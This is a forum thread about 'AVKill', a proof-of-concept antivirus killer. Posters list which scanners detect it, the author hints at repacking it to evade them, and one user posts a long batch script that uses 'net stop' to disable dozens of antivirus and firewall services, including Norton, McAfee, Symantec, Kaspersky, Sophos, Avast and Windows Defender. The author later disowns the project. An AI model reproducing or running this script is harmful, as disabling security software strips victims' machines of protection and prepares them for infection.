Jump to content

AntiVirus killer


moonlit

Recommended Posts

  • Replies 61
  • Created
  • Last Reply

Top Posters In This Topic

  • 1 month later...
  • 1 month later...

bitdefender 9 (second to newest version) detects avkiller as Generic.Malware.O!Ok!.56D47C5D

AntiVir 7.3.0.21 detects it as TR/AVkiller.AN

Panda 9.0.0.4 detects it as Trj/AVkiller.AN

anyone tried recently with norton or mcafee? those were the only two I didn't check with

Link to comment
Share on other sites

Woot! An app I made is detected by antivirus software. My work here is done, goodbye and goodnight!

I'm kidding. It's probably way too old to be useful already, you could try editing some of the code/packing it or whatever but meh, it's only a PoC anyways, it's there for you to do what you will with.

Link to comment
Share on other sites

Can't remember now, the info should be on the wiki, it's for AVG, NOD32, Avast (I think) and maybe one or two others, I didn't bother finishing it, I just left it for people to improve on... the basic framework is there...

Link to comment
Share on other sites

  • 1 year later...

i just made a bat file you can run without exe soemavs picked up kill.exe just run the bat file you can add to it. as the forum doesnt allow more then 10000 charaters in a post ill post partial..

echo. >> sc.txt
net stop NOD32 Kernel Service /y >> sc.txt
net stop "Network Associates McShield" /y >> sc.txt
net stop "Mcshield" /y >> sc.txt
net stop "McAfee Personal Firewall Service" /y >> sc.txt
net stop "Symantec AntiVirus Client" /y >> sc.txt
net stop "Norton AntiVirus Auto Protect Service" /y >> sc.txt
net stop "Microsoft firewall" /y >> sc.txt
net stop "Intel Alert Handler" /y >> sc.txt
net stop "Intel Alert Originator" /y >> sc.txt
net stop "Intel File Transfer" /y >> sc.txt
net stop "Intel PDS" /y >> sc.txt
net stop "SAVRoam" /y >> sc.txt
net stop "Symantec AntiVirus Definition Watcher" /y >> sc.txt
net stop "Symantec AntiVirus Definition" /y >> sc.txt
net stop "Symantec Event Manager" /y >> sc.txt
net stop "Symantec Network Drivers Service" /y >> sc.txt
net stop "Symantec Password Validation" /y >> sc.txt
net stop "Symantec SecurePort" /y >> sc.txt
net stop "Symantec Settings Manager" /y >> sc.txt
net stop "Symantec AntiVirus" /y >> sc.txt
net stop "Symantec Core LC" /y >> sc.txt
net stop "SNDSrvc" /y >> sc.txt
net stop "Symantec Network Drivers Servi" /y >> sc.txt
net stop "Symantec Network Drivers Service" /y >> sc.txt
net stop "SAVScan" /y >> sc.txt
net stop "Symantec AVScan" /y >> sc.txt
net stop "Norton AntiVirus Auto-Protect" /y >> sc.txt
net stop "NPFMntor" /y >> sc.txt
net stop "Norton AntiVirus Firewall Moni" /y >> sc.txt
net stop "Norton AntiVirus Firewall Monitor" /y >> sc.txt
net stop "NSCService" /y >> sc.txt
net stop "Norton Protection Center Servi" /y >> sc.txt
net stop "Norton Protection Center Service" /y >> sc.txt
net stop "ccSetMgr" /y >> sc.txt
net stop "ccEvtMgr" /y >> sc.txt
net stop "ccPwdSvc" /y >> sc.txt
net stop "SENS" /y >> sc.txt
net stop "SPBBCSvc" /y >> sc.txt
net stop "kavsvc" /y >> sc.txt
net stop "Kaspersky Antivirus" /y >> sc.txt
net stop "Kaspersky Antivirus TM" /y >> sc.txt
net stop "AVG anti-virus" /y >> sc.txt
net stop "McAfee virus scan" /y >> sc.txt
net stop "Norton AntiVirus" /y >> sc.txt
net stop "ZoneAlarm Firewall" /y >> sc.txt
net stop "AVG Antivirus" /y >> sc.txt
net stop "AdminServer" /y >> sc.txt
net stop "PavSrv" /y >> sc.txt
net stop "PavReport" /y >> sc.txt
net stop "PavPrSrv" /y >> sc.txt
net stop "PAvDCExc" /y >> sc.txt
net stop "PavAtScheduler" /y >> sc.txt
net stop "PAVAGENTE" /y >> sc.txt
net stop "Panda Software Controller" /y >> sc.txt
net stop "PadFSvr" /y >> sc.txt
net stop "PsImSvc" /y >> sc.txt
net stop "Sophos Agent" /y >> sc.txt
net stop "Sophos Message Router" /y >> sc.txt
net stop "SAVService" /y >> sc.txt
net stop "Sophos Anti-Virus" /y >> sc.txt
net stop "SAVAdminService" /y >> sc.txt
net stop "Sophos Anti-Virus status repor" /y >> sc.txt
net stop "Sophos Anti-Virus status report" /y >> sc.txt
net stop "Sophos AutoUpdate Service" /y >> sc.txt
net stop "MDaemon" /y >> sc.txt
net stop "avast!" /y >> sc.txt
net stop "avast! System Guard" /y >> sc.txt
net stop "avast" /y >> sc.txt
net stop "WinDefend" /y >> sc.txt
net stop "Windows Defender Service" /y >> sc.txt
net stop "AvgServ" /y >> sc.txt
net stop "AVG6 Service" /y >> sc.txt
net stop "Avg7Alrt" /y >> sc.txt
net stop "Avg7UpdSvc" /y >> sc.txt
echo. >> sc.txt
echo. >> sc.txt
cls

Link to comment
Share on other sites

  • 2 weeks later...
May I ask why the wiki page is gone missing?

If you're referring to the wiki page on which the original AVKill was distributed, this "project" is long, long dead and I'd like it to stay that way. I no longer have the binary or source for the program and if I did I wouldn't be distributing it. It was just another antivirus killer, much like any other, and was only meant to show that it was easy to do and it was not meant to be used in the real world.

Link to comment
Share on other sites

May I ask why the wiki page is gone missing?

If you're referring to the wiki page on which the original AVKill was distributed, this "project" is long, long dead and I'd like it to stay that way. I no longer have the binary or source for the program and if I did I wouldn't be distributing it. It was just another antivirus killer, much like any other, and was only meant to show that it was easy to do and it was not meant to be used in the real world.

Thank-you for the clarification, moonlit. I was just wondering about that, that is all.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...